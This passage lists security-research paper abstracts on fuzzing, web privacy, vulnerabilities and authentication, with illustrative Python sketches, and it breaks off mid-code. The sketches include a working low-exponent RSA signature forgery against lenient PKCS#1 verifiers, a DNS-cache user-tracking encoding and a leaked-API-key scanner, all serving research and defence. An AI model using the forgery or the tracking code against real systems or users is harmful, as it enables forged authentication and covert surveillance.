In this paper, we approach geographical avoidance starting from a thorough assessment of its challenges. These challenges serve as the foundation for the design of an empirical avoidance concept that considers actual transmission characteristics for justified decisions. Furthermore, we address the problems of untrusted or intransparent ground truth information that hinder a reliable assessment of circuits. Taking these features into account, we conduct an empirical simulation study and compare the performance of our novel avoidance concept with existing approaches. Our results show that we outperform existing systems, rejecting 22% fewer circuits and thereby reducing the collateral damage of overly restrictive avoidance decisions. In a second evaluation step, we extend our initial system concept and implement the prototype MultilateraTor. This prototype is the first to satisfy the requirements of a practical deployment, as it maintains Tor’s original level of security, provides reasonable performance, and overcomes the fundamental security flaws of existing systems.

4A: Fuzzing

PeriScope: An Effective Probing and Fuzzing Framework for the Hardware-OS Boundary

The OS kernel is an attractive target for remote attackers. If compromised, the kernel gives adversaries full system access, including the ability to install rootkits, extract sensitive information, and perform other malicious actions, all while evading detection. Most of the kernel’s attack surface is situated along the system call boundary. Ongoing kernel protection efforts have focused primarily on securing this boundary; several capable analysis and fuzzing frameworks have been developed for this purpose.

However, there are additional paths to kernel compromise that do not involve system calls, as demonstrated by several recent exploits. For example, by compromising the firmware of a peripheral device such as a Wi-Fi chipset and subsequently sending malicious inputs from the Wi-Fi chipset to the Wi-Fi driver, adversaries have been able to gain control over the kernel without invoking a single system call. Unfortunately, there are currently no practical probing and fuzzing frameworks that can help developers find and fix such vulnerabilities occurring along the hardware-OS boundary.

We present PeriScope, a Linux kernel based probing framework that enables fine-grained analysis of device-driver interactions. PeriScope hooks into the kernel’s page fault handling mechanism to either passively monitor and log traffic between device drivers and their corresponding hardware, or mutate the data stream on-the-fly using a fuzzing component, PeriFuzz, thus mimicking an active adversarial attack. PeriFuzz accurately models the capabilities of an attacker on peripheral devices, to expose different classes of bugs including, but not limited to, memory corruption bugs and double-fetch bugs. To demonstrate the risk that peripheral devices pose, as well as the value of our framework, we have evaluated PeriFuzz on the Wi-Fi drivers of two popular chipset vendors, where we discovered 15 unique vulnerabilities, 9 of which were previously unknown.

REDQUEEN: Fuzzing with Input-to-State Correspondence

Automated software testing based on fuzzing has experienced a revival in recent years. Especially feedback-driven fuzzing has become well-known for its ability to efficiently perform randomized testing with limited input corpora. Despite a lot of progress, two common problems are magic numbers and (nested) checksums. Computationally expensive methods such as taint tracking and symbolic execution are typically used to overcome such roadblocks. Unfortunately, such methods often require access to source code, a rather precise description of the environment (e.g., behavior of library calls or the underlying OS), or the exact semantics of the platform’s instruction set.

In this paper, we introduce a lightweight, yet very effective alternative to taint tracking and symbolic execution to facilitate and optimize state-of-the-art feedback fuzzing that easily scales to large binary applications and unknown environments. We observe that during the execution of a given program, parts of the input often end up directly (i.e., nearly unmodified) in the program state. This input-to-state correspondence can be exploited to create a robust method to overcome common fuzzing roadblocks in a highly effective and efficient manner. Our prototype implementation, called REDQUEEN, is able to solve magic bytes and (nested) checksum tests automatically for a given binary executable. Additionally, we show that our techniques outperform various state-of-the-art tools on a wide variety of targets across different privilege levels (kernel-space and userland) with no platform-specific code. REDQUEEN is the first method to find more than 100% of the bugs planted in LAVA-M across all targets. Furthermore, we were able to discover 65 new bugs and obtained 16 CVEs in multiple programs and OS kernel drivers. Finally, our evaluation demonstrates that REDQUEEN is fast, widely applicable and outperforms concurrent approaches by up to three orders of magnitude.
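
A minimal sketch of the input-to-state correspondence idea: if a traced comparison operand appears verbatim in the input, patch that occurrence with the other operand to satisfy the check. The traced_compares list below is a made-up stand-in for real execution traces.

```python
def solve_magic_bytes(input_bytes, traced_compares):
    """traced_compares: [(lhs, rhs), ...] operand pairs seen at cmp sites."""
    candidates = []
    for lhs, rhs in traced_compares:
        for pattern, replacement in ((lhs, rhs), (rhs, lhs)):
            pos = input_bytes.find(pattern)
            if pos != -1:  # operand came (nearly unmodified) from the input
                mutated = (input_bytes[:pos] + replacement
                           + input_bytes[pos + len(pattern):])
                candidates.append(mutated)
    return candidates

seed = b"AAAAMAGZAAAA"
# One comparison observed at runtime: cmp(input[4:8], b"MAGE")  (hypothetical)
for candidate in solve_magic_bytes(seed, [(b"MAGZ", b"MAGE")]):
    print(candidate)
```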

NAUTILUS: Fishing for Deep Bugs with Grammars

Fuzzing is a well-known method for efficiently identifying bugs in programs. Unfortunately, when fuzzing targets that require highly-structured inputs such as interpreters, many fuzzing methods struggle to pass the syntax checks. More specifically, interpreters often process inputs in multiple stages: first syntactic, then semantic correctness is checked. Only if these checks are passed, the interpreted code gets executed. This prevents fuzzers from executing "deeper" (and hence potentially more interesting) code. Typically, two valid inputs that lead to the execution of different features in the target application require too many mutations for simple mutation-based fuzzers to discover: making small changes like bit flips usually only leads to the execution of error paths in the parsing engine. So-called grammar fuzzers are able to pass the syntax checks by using Context-Free Grammars. Using feedback can significantly increase the efficiency of fuzzing engines. Hence, it is commonly used in state-of-the-art mutational fuzzers that do not use grammars. Yet, grammar fuzzers do not make use of code coverage, i.e., they do not know whether any input triggers new functionality or not.

In this paper, we propose NAUTILUS, a method to efficiently fuzz programs that require highly-structured inputs by combining the use of grammars with the use of code coverage feedback. This allows us to recombine aspects of interesting inputs that were learned individually, and to dramatically increase the probability that any generated input will be accepted by the parser. We implemented a proof-of-concept fuzzer that we tested on multiple targets, including ChakraCore (the JavaScript engine of Microsoft Edge), PHP, mruby, and Lua. NAUTILUS identified multiple bugs in all of the targets: seven in mruby, three in PHP, two in ChakraCore, and one in Lua. Reporting these bugs was rewarded with bounties totaling 2,600 USD, and 6 CVEs were assigned. Our experiments show that combining context-free grammars and feedback-driven fuzzing significantly outperforms state-of-the-art approaches like American Fuzzy Lop (AFL) by an order of magnitude and grammar fuzzers by more than a factor of two when measuring code coverage.
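
A minimal sketch of the grammar-based generation half of the approach (without the coverage feedback loop the paper adds on top); the toy grammar is an illustrative assumption.

```python
import random

GRAMMAR = {
    "<stmt>": [["var x = ", "<expr>", ";"], ["print(", "<expr>", ");"]],
    "<expr>": [["<num>"], ["<expr>", " + ", "<expr>"], ["(", "<expr>", ")"]],
    "<num>":  [["1"], ["2"], ["42"]],
}

def generate(symbol, depth=0, max_depth=6):
    if symbol not in GRAMMAR:
        return symbol  # terminal: emit as-is
    rules = GRAMMAR[symbol]
    if depth >= max_depth:  # force termination: fall back to the shortest rule
        rules = [min(rules, key=len)]
    rule = random.choice(rules)
    return "".join(generate(s, depth + 1, max_depth) for s in rule)

for _ in range(3):
    print(generate("<stmt>"))  # syntactically valid by construction
```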

Analyzing Semantic Correctness with Symbolic Execution: A Case Study on PKCS#1 v1.5 Signature Verification

We discuss how symbolic execution can be used to not only find low-level errors but also analyze the semantic correctness of protocol implementations. To avoid manually crafting test cases, we propose a strategy of meta-level search, which leverages constraints stemming from the input formats to automatically generate concolic test cases. Additionally, to aid root-cause analysis, we develop constraint provenance tracking (CPT), a mechanism that associates atomic sub-formulas of path constraints with their corresponding source-level origins. We demonstrate the power of symbolic analysis with a case study on PKCS#1 v1.5 signature verification. Leveraging meta-level search and CPT, we analyzed 15 recent open-source implementations using symbolic execution and found semantic flaws in 6 of them. Further analysis of these flaws showed that 4 implementations are susceptible to new variants of the Bleichenbacher low-exponent RSA signature forgery. One implementation suffers from potential denial of service attacks with purposefully crafted signatures. All our findings have been responsibly shared with the affected vendors. Among the flaws discovered, 6 new CVEs have been assigned to the immediately exploitable ones.
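
The low-exponent forgery that the flawed verifiers fall for is easy to sketch: if a verifier does not insist that the PKCS#1 v1.5 padding fills the whole modulus, any s whose cube merely starts with 00 01 FF 00 || ASN.1 || hash verifies under e = 3. A minimal sketch, assuming a 2048-bit modulus and such a lenient verifier:

```python
import hashlib

# DigestInfo prefix for SHA-256 (real ASN.1 bytes).
SHA256_ASN1 = bytes.fromhex("3031300d060960864801650304020105000420")

def icbrt(n):
    """Integer cube root (floor), Newton's method."""
    x = 1 << -(-n.bit_length() // 3)  # start above the real root
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y

def forge(message, modulus_bits=2048):
    digest = hashlib.sha256(message).digest()
    prefix = b"\x00\x01\xff\x00" + SHA256_ASN1 + digest
    garbage_bits = (modulus_bits // 8 - len(prefix)) * 8
    target = int.from_bytes(prefix, "big") << garbage_bits  # garbage = zeros
    s = icbrt(target) + 1  # round up so that s**3 >= target
    # s**3 still begins with the required prefix: the cube grows far more
    # slowly than the huge "garbage" region at the end of the block.
    assert (s ** 3).to_bytes(modulus_bits // 8, "big").startswith(prefix)
    return s  # a lenient verifier accepts s as a signature on message

print(hex(forge(b"hello"))[:32], "...")
```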

Send Hardest Problems My Way: Probabilistic Path Prioritization for Hybrid Fuzzing

Hybrid fuzzing, which combines fuzzing and concolic execution, has become an advanced technique for software vulnerability detection. Based on the observation that fuzzing and concolic execution are complementary in nature, state-of-the-art hybrid fuzzing systems deploy "demand launch" and "optimal switch" strategies. Although these ideas sound intriguing, we point out several fundamental limitations in them, due to oversimplified assumptions. We then propose a novel "discriminative dispatch" strategy to better utilize the capability of concolic execution. We design a novel Monte Carlo based probabilistic path prioritization model to quantify each path’s difficulty and prioritize them for concolic execution. This model treats fuzzing as a random sampling process. It calculates each path’s probability based on the sampling information. Finally, our model prioritizes and assigns the most difficult paths to concolic execution. We implement a prototype system DigFuzz and evaluate our system with two representative datasets. Results show that the concolic execution in DigFuzz outperforms that in the state-of-the-art hybrid fuzzing system Driller in every major aspect. In particular, the concolic execution in DigFuzz contributes to discovering more vulnerabilities (12 vs. 5) and producing more code coverage (18.9% vs. 3.8%) on the CQE dataset than the concolic execution in Driller.
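
A minimal sketch of the Monte Carlo path prioritization idea: estimate branch probabilities from fuzzer hit counts, multiply them along a path, and hand the least probable (hardest) paths to concolic execution first. The hit counts are made up, and the smoothing below is a simplification of the paper's estimator.

```python
import math

def branch_prob(hits, total):
    """Probability of one branch outcome, with Laplace smoothing;
    the paper's Monte Carlo estimator differs in its details."""
    return (hits + 1) / (total + 2)

def path_difficulty(path, hit_counts):
    """path: [(branch_id, taken_bool)]; returns -log(path probability)."""
    cost = 0.0
    for branch, taken in path:
        taken_hits, other_hits = hit_counts[branch]
        hits = taken_hits if taken else other_hits
        cost -= math.log(branch_prob(hits, taken_hits + other_hits))
    return cost

# Made-up coverage statistics: (times taken, times not taken) per branch.
hit_counts = {"b1": (900, 100), "b2": (1, 999), "b3": (0, 500)}
paths = {
    "easy": [("b1", True)],
    "hard": [("b2", True), ("b3", True)],  # rare outcomes: hard for fuzzing
}
for name in sorted(paths, key=lambda n: path_difficulty(paths[n], hit_counts),
                   reverse=True):
    print(name, round(path_difficulty(paths[name], hit_counts), 2))
```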

4B: Privacy on the Web

Measuring the Facebook Advertising Ecosystem

The Facebook advertising platform has been subject to a number of controversies in the past years regarding privacy violations, lack of transparency, as well as its capacity to be used by dishonest actors for discrimination or propaganda. In this study, we aim to provide a better understanding of the Facebook advertising ecosystem, focusing on how it is being used by advertisers. We first analyze the set of advertisers and then investigate how those advertisers are targeting users and customizing ads via the platform. Our analysis is based on the data we collected from over 600 real-world users via a browser extension that collects the ads our users receive when they browse their Facebook timeline, as well as the explanations for why users received these ads.

Our results reveal that users are targeted by a wide range of advertisers (e.g., from popular to niche advertisers); that a non-negligible fraction of advertisers are part of potentially sensitive categories such as news and politics, health or religion; that a significant number of advertisers employ targeting strategies that could be either invasive or opaque; and that many advertisers use a variety of targeting parameters and ad texts. Overall, our work emphasizes the need for better mechanisms to audit ads and advertisers in social media and provides an overview of the platform usage that can help move towards such mechanisms.

We Value Your Privacy … Now Take Some Cookies: Measuring the GDPR’s Impact on Web Privacy

The European Union’s General Data Protection Regulation (GDPR) went into effect on May 25, 2018. Its privacy regulations apply to any service and company collecting or processing personal data in Europe. Many companies had to adjust their data handling processes, consent forms, and privacy policies to comply with the GDPR’s transparency requirements. We monitored this rare event by analyzing changes on popular websites in all 28 member states of the European Union. For each country, we periodically examined its 500 most popular websites – 6,579 in total – for the presence of and updates to their privacy policy between December 2017 and October 2018. While many websites already had privacy policies, we find that in some countries up to 15.7 % of websites added new privacy policies by May 25, 2018, resulting in 84.5 % of websites having privacy policies. 72.6 % of websites with existing privacy policies updated them close to the date. After May this positive development slowed down noticeably. Most visibly, 62.1 % of websites in Europe now display cookie consent notices, 16 % more than in January 2018. These notices inform users about a site’s cookie use and user tracking practices. We categorized all observed cookie consent notices and evaluated 28 common implementations with respect to their technical realization of cookie consent. Our analysis shows that core web security mechanisms such as the same-origin policy pose problems for the implementation of consent according to GDPR rules, and opting out of third-party cookies requires the third party to cooperate. Overall, we conclude that the web became more transparent at the time GDPR came into force, but there is still a lack of both functional and usable mechanisms for users to consent to or deny processing of their personal data on the Internet.

How Bad Can It Git? Characterizing Secret Leakage in Public GitHub Repositories

GitHub and similar platforms have made public collaborative development of software commonplace. However, a problem arises when this public code must manage authentication secrets, such as API keys or cryptographic secrets. These secrets must be kept private for security, yet common development practices like adding these secrets to code make accidental leakage frequent. In this paper, we present the first large-scale and longitudinal analysis of secret leakage on GitHub. We examine billions of files collected using two complementary approaches: a nearly six-month scan of real-time public GitHub commits and a public snapshot covering 13% of open-source repositories. We focus on private key files and 11 high-impact platforms with distinctive API key formats. This focus allows us to develop conservative detection techniques that we manually and automatically evaluate to ensure accurate results. We find that not only is secret leakage pervasive — affecting over 100,000 repositories — but that thousands of new, unique secrets are leaked every day. We also use our data to explore possible root causes of leakage and to evaluate potential mitigation strategies. This work shows that secret leakage on public repository platforms is rampant and far from a solved problem, placing developers and services at persistent risk of compromise and abuse.
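
A minimal sketch of the two detection ingredients described: a regex per distinctive key format plus an entropy filter to discard obvious dummy values. The two patterns below (AWS access key IDs and Google API keys) are well-known formats used here as examples.

```python
import math
import re

KEY_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "google_api_key":    re.compile(r"\bAIza[0-9A-Za-z\-_]{35}\b"),
}

def shannon_entropy(s):
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs)

def scan(text, min_entropy=3.0):
    findings = []
    for name, pattern in KEY_PATTERNS.items():
        for match in pattern.finditer(text):
            if shannon_entropy(match.group()) >= min_entropy:  # drop AKIAAAAA...
                findings.append((name, match.group()))
    return findings

print(scan('aws_key = "AKIAIOSFODNN7EXAMPLE"  # leaked in a commit'))
```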

DNS Cache-Based User Tracking

We describe a novel user tracking technique that is based on assigning statistically unique DNS records per user. This new tracking technique is unique in being able to distinguish between machines that have identical hardware and software, and track users even if they use “privacy mode” browsing, or use multiple browsers (on the same machine). The technique overcomes issues related to the caching of DNS answers in resolvers, and utilizes per-device caching of DNS answers at the client. We experimentally demonstrate that it covers the technologies used by a very large fraction of Internet users (in terms of browsers, operating systems, and DNS resolution platforms).

Our technique can track users for up to a day (typically), and therefore works best when combined with other, narrower yet longer-lived techniques such as regular cookies; we briefly explain how to combine such techniques. We suggest mitigations to this tracking technique but note that it is not easily mitigated. There are possible workarounds, yet these are not without setup, performance, or convenience overhead. A complete mitigation requires software modifications in both browsers and resolver software.
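
As a rough illustration of how an identifier can be encoded into DNS cache state, the sketch below maps an ID to a subset of hostnames and reads it back from cache hits; the paper's actual construction, based on statistically unique per-user DNS answers, differs in its details.

```python
def hostnames_for_id(user_id, bits=16, domain="t.example.com"):
    """Resolve hostname i on the first visit iff bit i of the ID is 1."""
    return [f"b{i}.{domain}" for i in range(bits) if (user_id >> i) & 1]

def id_from_cache_hits(cached_hostnames, bits=16, domain="t.example.com"):
    """On a later visit, cached (previously resolved) names spell the ID."""
    user_id = 0
    for i in range(bits):
        if f"b{i}.{domain}" in cached_hostnames:
            user_id |= 1 << i
    return user_id

hosts = hostnames_for_id(0xBEEF)
print(hosts[:3], "...")
print(hex(id_from_cache_hits(set(hosts))))
```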

Quantity vs. Quality: Evaluating User Interest Profiles Using Ad Preference Managers

Widely reported privacy issues concerning major online advertising platforms (e.g., Facebook) have heightened concerns among users about the data that is collected about them. However, while we have a comprehensive understanding of who collects data on users, as well as how tracking is implemented, there is still a significant gap in our understanding: what information do advertisers actually infer about users, and is this information accurate?

In this study, we leverage Ad Preference Managers (APMs) as a lens through which to address this gap. APMs are transparency tools offered by some advertising platforms that allow users to see the interest profiles that are constructed about them. We recruited 220 participants to install an IRB-approved browser extension that collected their interest profiles from four APMs (Google, Facebook, Oracle BlueKai, and Nielsen eXelate), as well as behavioral and survey data. We use this data to analyze the size and correctness of interest profiles, compare their composition across the four platforms, and investigate the origins of the data underlying these profiles.

5A: Bugs and Vulnerabilities

Thunderclap: Exploring Vulnerabilities in Operating System IOMMU Protection via DMA from Untrustworthy Peripherals

Direct Memory Access (DMA) attacks have been known for many years: DMA-enabled I/O peripherals have complete access to the state of a computer and can fully compromise it including reading and writing all of system memory.

With the popularity of Thunderbolt 3 over USB Type-C and smart internal devices, opportunities for these attacks to be performed casually with only seconds of physical access to a computer have greatly broadened. In response, commodity hardware and operating-system (OS) vendors have incorporated support for Input-Output Memory Management Units (IOMMUs), which impose memory protection on DMA, and are widely believed to protect against DMA attacks.

We investigate the state of the art in IOMMU protection across OSes using a novel I/O security research platform, and find that current protections fall short when faced with a functional network peripheral that uses its complex interactions with the OS for ill intent. We demonstrate compromises against macOS, FreeBSD, and Linux, which notionally utilize IOMMUs to protect against DMA attackers; Windows only uses the IOMMU in limited cases and remains vulnerable.

Using Thunderclap, an open-source FPGA research platform we built, we explore a number of novel exploit techniques to expose new classes of OS vulnerability. The complex vulnerability space for IOMMU-exposed shared memory available to DMA-enabled peripherals allows attackers to extract private data (sniffing cleartext VPN traffic) and hijack kernel control flow (launching a root shell) in seconds using devices such as USB-C projectors or power adapters.

We have worked closely with OS vendors to remedy these vulnerability classes, and they have now shipped substantial feature improvements and mitigations as a result of our work.

One Engine To Serve ‘em All: Inferring Taint Rules Without Architectural Semantics

Dynamic binary taint analysis has wide applications in the security analysis of commercial-off-the-shelf (COTS) binaries. One of the key challenges in dynamic binary analysis is to specify the taint rules that capture how taint information propagates for each instruction on an architecture. Most of the existing solutions specify taint rules using a deductive approach by summarizing the rules manually after analyzing the instruction semantics. Intuitively, taint propagation reflects how an instruction’s input affects its output and thus can be observed from instruction executions. In this work, we propose an inductive method for taint propagation and develop a universal taint tracking engine that is architecture-agnostic. Our taint engine, TAINTINDUCE, can learn taint rules with minimal architectural knowledge by observing the execution behavior of instructions. To measure its correctness and guide taint rule generation, we define the precise notion of soundness for bit-level taint tracking in this novel setup. In our evaluation, we show that TAINTINDUCE automatically learns rules for 4 widely used architectures: x86, x64, AArch64, and MIPS-I. It can detect vulnerabilities for 24 CVEs in 15 applications on both Linux and Windows over millions of instructions and is comparable with other mature existing tools (TEMU [51], libdft [32], Triton [42]). TAINTINDUCE can be used as a standalone taint engine or be used to complement existing taint engines for unhandled instructions. Further, it can be used as a cross-referencing tool to uncover bugs in taint engines, emulation implementations, and ISA documentation.
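
A minimal sketch of the observation-based inference idea: run an operation on random inputs, flip each input bit, and record which output bits can change. The Python lambda stands in for a single instruction's semantics.

```python
import random

def infer_taint_rule(op, in_bits=8, out_bits=8, trials=64):
    """Return, per input bit, the set of output bits it may influence."""
    influence = {i: set() for i in range(in_bits)}
    for _ in range(trials):
        x = random.randrange(1 << in_bits)
        base = op(x)
        for i in range(in_bits):
            diff = base ^ op(x ^ (1 << i))  # output bits that flipped
            influence[i] |= {j for j in range(out_bits) if (diff >> j) & 1}
    return influence

# Example instruction semantics: shift-left-by-1 on an 8-bit register.
rule = infer_taint_rule(lambda x: (x << 1) & 0xFF)
for src, dsts in rule.items():
    print(f"input bit {src} taints output bits {sorted(dsts)}")
```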

Automating Patching of Vulnerable Open-Source Software Versions in Application Binaries

Mobile application developers rely heavily on open-source software (OSS) to offload common functionalities such as the implementation of protocols and media format playback. Over the past years, several vulnerabilities have been found in popular open-source libraries like OpenSSL and FFmpeg. Mobile applications that include such libraries inherit these flaws, which make them vulnerable. Fortunately, the open-source community is responsive and patches are made available within days. However, mobile application developers are often left unaware of these flaws. The App Security Improvement Program (ASIP) is a commendable effort by Google to notify application developers of these flaws, but recent work has shown that many developers do not act on this information.

Our work addresses vulnerable mobile applications through automatic binary patching from source patches provided by the OSS maintainers and without involving the developers. We propose novel techniques to overcome difficult challenges like patching feasibility analysis, source-code-to-binary-code matching, and in-memory patching. Our technique uses a novel variability-aware approach, which we implement as OSSPatcher. We evaluated OSSPatcher with 39 OSS and a collection of 1,000 Android applications using their vulnerable versions. OSSPatcher generated 675 function-level patches that fixed the affected mobile applications without breaking their binary code. Further, we evaluated 10 vulnerabilities in popular apps such as Chrome with public exploits, which OSSPatcher was able to mitigate and thwart their exploitation.

CRCount: Pointer Invalidation with Reference Counting to Mitigate Use-after-free in Legacy C/C++

Pointer invalidation has been a popular approach adopted in many recent studies to mitigate use-after-free errors. The approach can be divided largely into two different schemes: explicit invalidation and implicit invalidation. The former aims to eradicate the root cause of use-after-free errors by invalidating every dangling pointer one by one explicitly. In contrast, the latter aims to prevent dangling pointers by freeing an object only if there is no pointer referring to it. A downside of the explicit scheme is that it is expensive, as it demands high-cost algorithms or a large amount of space to maintain every up-to-date list of pointer locations linking to each object at all times. Implicit invalidation is more efficient in that even without any explicit effort, it can eliminate dangling pointers by leaving objects undeleted until all the links between the objects and their referring pointers vanish by themselves during program execution. However, such an argument only holds if the scheme knows exactly when each link is created and deleted. Reference counting is a traditional method to determine the existence of reference links between objects and pointers. Unfortunately, impeccable reference counting for legacy C/C++ code is very difficult and expensive to achieve in practice, mainly because of the type unsafe operations in the code. In this paper, we present a solution, called CRCount, to the use-after-free problem in legacy C/C++. For effective and efficient problem solving, CRCount is armed with the pointer footprinting technique that enables us to compute, with high accuracy, the reference count of every object referred to by the pointers in the legacy code. Our experiments demonstrate that CRCount mitigates the use-after-free errors with a lower performance-wise and space-wise overhead than the existing pointer invalidation solutions.

CodeAlchemist: Semantics-Aware Code Generation to Find Vulnerabilities in JavaScript Engines

JavaScript engines are an attractive target for attackers due to their popularity and flexibility in building exploits. Current state-of-the-art fuzzers for finding JavaScript engine vulnerabilities focus mainly on generating syntactically correct test cases based on either a predefined context-free grammar or a trained probabilistic language model. Unfortunately, syntactically correct JavaScript sentences are often semantically invalid at runtime. Furthermore, statically analyzing the semantics of JavaScript code is challenging due to its dynamic nature: JavaScript code is generated at runtime, and JavaScript expressions are dynamically-typed. To address this challenge, we propose a novel test case generation algorithm that we call semantics-aware assembly, and implement it in a fuzz testing tool termed CodeAlchemist. Our tool can generate arbitrary JavaScript code snippets that are both semantically and syntactically correct, and it effectively yields test cases that can crash JavaScript engines. We found numerous vulnerabilities of the latest JavaScript engines with CodeAlchemist and reported them to the vendors.
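
A minimal sketch of semantics-aware assembly: each "code brick" declares the variable types it needs (preconditions) and defines (postconditions), and bricks are chained only when the live type environment satisfies the next brick's preconditions. The bricks and type system below are toy assumptions.

```python
import random

BRICKS = [
    {"code": "var a = 1;",           "pre": {},              "post": {"a": "number"}},
    {"code": "var s = 'x';",         "pre": {},              "post": {"s": "string"}},
    {"code": "var b = a + 2;",       "pre": {"a": "number"}, "post": {"b": "number"}},
    {"code": "var t = s.repeat(b);", "pre": {"s": "string", "b": "number"},
                                     "post": {"t": "string"}},
]

def assemble(n_bricks=4):
    env, program = {}, []
    for _ in range(n_bricks):
        usable = [b for b in BRICKS
                  if all(env.get(v) == ty for v, ty in b["pre"].items())]
        brick = random.choice(usable)  # never empty: two bricks need nothing
        program.append(brick["code"])
        env.update(brick["post"])
    return "\n".join(program)

print(assemble())  # semantically valid JS snippet by construction
```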

6A: Authentication

Coconut: Threshold Issuance Selective Disclosure Credentials with Applications to Distributed Ledgers

Coconut is a novel selective disclosure credential scheme supporting distributed threshold issuance, public and private attributes, re-randomization, and multiple unlinkable selective attribute revelations. Coconut integrates with Blockchains to ensure confidentiality, authenticity and availability even when a subset of credential issuing authorities are malicious or offline. We implement and evaluate a generic Coconut smart contract library for Chainspace and Ethereum; and present three applications related to anonymous payments, electronic petitions, and distribution of proxies for censorship resistance.
Coconut uses short and computationally efficient credentials, and our evaluation shows that most Coconut cryptographic primitives take just a few milliseconds on average, with verification taking the longest time (10 milliseconds).

Distinguishing Attacks from Legitimate Authentication Traffic at Scale

Online guessing attacks against password servers can be hard to address. Approaches that throttle or block repeated guesses on an account (e.g., three-strikes-type lockout rules) can be effective against depth-first attacks, but are of little help against breadth-first attacks that spread guesses very widely. At large providers with tens or hundreds of millions of accounts, breadth-first attacks offer a way to send millions or even billions of guesses without ever triggering the depth-first defenses. The absence of labels and the non-stationarity of attack traffic make it challenging to apply machine learning techniques.

We show how to accurately estimate the odds that an observation $x$ associated with a request is malicious. Our main assumptions are that successful malicious logins are a small fraction of the total, and that the distribution of $x$ in the legitimate traffic is stationary, or very slowly varying. From these we show how we can estimate the ratio of bad-to-good traffic among any set of requests; how we can then identify subsets of the request data that contain the least (or even no) attack traffic; how these least-attacked subsets allow us to estimate the distribution of values of $x$ over the legitimate data, and hence calculate the odds ratio. A sensitivity analysis shows that even when we fail to identify a subset with little attack traffic, our odds ratio estimates are very robust.
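
A minimal sketch of the core quantity: given the distribution of a feature value x in (nearly) attack-free traffic and in the observed mixed traffic, the ratio of the two frequencies flags values that are over-represented among requests. The feature and counts below are hypothetical.

```python
from collections import Counter

def odds_ratio(observed, legit_reference):
    """Per-value ratio of observed frequency to legitimate frequency;
    values much greater than 1 are over-represented, hence suspicious."""
    obs, ref = Counter(observed), Counter(legit_reference)
    n_obs, n_ref = len(observed), len(legit_reference)
    return {x: (obs[x] / n_obs) / (max(ref[x], 1) / n_ref) for x in obs}

# Hypothetical feature: does the attempted username exist? Legitimate
# users rarely mistype their own name; breadth-first guessers often do.
legit = ["exists"] * 990 + ["unknown"] * 10
mixed = ["exists"] * 700 + ["unknown"] * 300
print(odds_ratio(mixed, legit))  # "unknown" is ~30x over-represented
```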

Robust Performance Metrics for Authentication Systems

Research has produced many types of authentication systems that use machine learning. However, there is no consistent approach for reporting performance metrics and the reported metrics are inadequate. In this work, we show that several of the common metrics used for reporting performance, such as maximum accuracy (ACC), equal error rate (EER) and area under the ROC curve (AUROC), are inherently flawed. These common metrics hide the details of the inherent trade-offs a system must make when implemented. Our findings show that current metrics give no insight into how system performance degrades outside the ideal conditions in which they were designed. We argue that adequate performance reporting must be provided to enable meaningful evaluation and that current, commonly used approaches fail in this regard. We present the unnormalized frequency count of scores (FCS) to demonstrate the mathematical underpinnings that lead to these failures and show how they can be avoided. The FCS can be used to augment the performance reporting to enable comparison across systems in a visual way. When reported with the Receiver Operating Characteristics curve (ROC), these two metrics provide a solution to the limitations of currently reported metrics. Finally, we show how to use the FCS and ROC metrics to evaluate and compare different authentication systems.

Total Recall: Persistence of Passwords in Android

A good security practice for handling sensitive data, such as passwords, is to overwrite the data buffers with zeros once the data is no longer in use. This protects against attackers who gain a snapshot of a device’s physical memory, whether by in-person physical attacks, or by remote attacks like Meltdown and Spectre. This paper looks at unnecessary password retention in Android phones by popular apps, secure password management apps, and even the lockscreen system process. We have performed a comprehensive analysis of the Android framework and a variety of apps, and discovered that passwords can survive in a variety of locations, including UI widgets where users enter their passwords, apps that retain passwords rather than exchange them for tokens, old copies not yet reused by garbage collectors, and buffers in keyboard apps. We have developed solutions that successfully fix these problems with modest code changes.

How to End Password Reuse on the Web

We present a framework by which websites can coordinate to make it difficult for users to set similar passwords at these websites, in an effort to break the culture of password reuse on the web today.
Though the design of such a framework is fraught with risks to users’ security and privacy, we show that these risks can be effectively mitigated through careful scoping of the goals for such a framework and through principled design. At the core of our framework is a private set-membership-test protocol that enables one website to determine, upon a user setting a password for use at it, whether that user has already set a similar password at another participating website, but with neither side disclosing to the other the password(s) it employs in the protocol. Our framework then layers over this protocol a collection of techniques to mitigate the leakage necessitated by such a test. We verify via probabilistic model checking that these techniques are effective in maintaining account security, and since these mechanisms are consistent with common user experience today, our framework should be unobtrusive to users who do not reuse similar passwords across websites (e.g., due to having adopted a password manager). Through a working implementation of our framework and optimization of its parameters based on insights of how passwords tend to be reused, we show that our design can meet the scalability challenges facing such a service.

11: Machine Learning & Game Theory Applications

Graph-based Security and Privacy Analytics via Collective Classification with Joint Weight Learning and Propagation

Many security and privacy problems can be modeled as a graph classification problem, where nodes in the graph are classified simultaneously by collective classification. State-of-the-art collective classification methods for such graph-based security and privacy analytics follow a common paradigm: assign weights to edges of the graph, iteratively propagate reputation scores of nodes among the weighted graph, and use the final reputation scores to classify nodes in the graph. The key challenge is to assign edge weights such that an edge has a large weight if the two corresponding nodes have the same label, and a small weight otherwise. Although collective classification has been studied and applied for security and privacy problems for more than a decade, how to address this challenge is still an open question. For instance, most existing methods simply set a constant weight to all edges.

In this work, we propose a novel collective classification framework to address this long-standing challenge. We first formulate learning edge weights as an optimization problem, which quantifies the goals we aim to achieve for the final reputation scores. However, it is computationally hard to solve the optimization problem because the final reputation scores depend on the edge weights in a very complex way. To address the computational challenge, we propose to jointly learn the edge weights and propagate the reputation scores, which is essentially an approximate solution to the optimization problem. We compare our framework with state-of-the-art methods for graph-based security and privacy analytics using four large-scale real-world datasets from various application scenarios such as Sybil detection in social networks, fake review detection in Yelp, and attribute inference attacks. Our results demonstrate that our framework achieves higher accuracies than state-of-the-art methods with an acceptable computational overhead.
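
A minimal sketch of the weighted reputation propagation that such frameworks build on (without the joint weight learning that is the paper's contribution); the graph, weights, and seed labels are toy assumptions.

```python
def propagate(nodes, edges, weights, seeds, iters=20, damping=0.5):
    """edges: {node: [neighbors]}; seeds: {node: +1 benign / -1 Sybil}."""
    score = {n: seeds.get(n, 0.0) for n in nodes}
    for _ in range(iters):
        new = {}
        for n in nodes:
            nbrs = edges.get(n, [])
            agg = sum(weights[(n, m)] * score[m] for m in nbrs)
            new[n] = seeds.get(n, 0.0) + damping * agg / max(len(nbrs), 1)
        score = new
    return score  # sign of the final score classifies unlabeled nodes

nodes = ["a", "b", "c", "d"]
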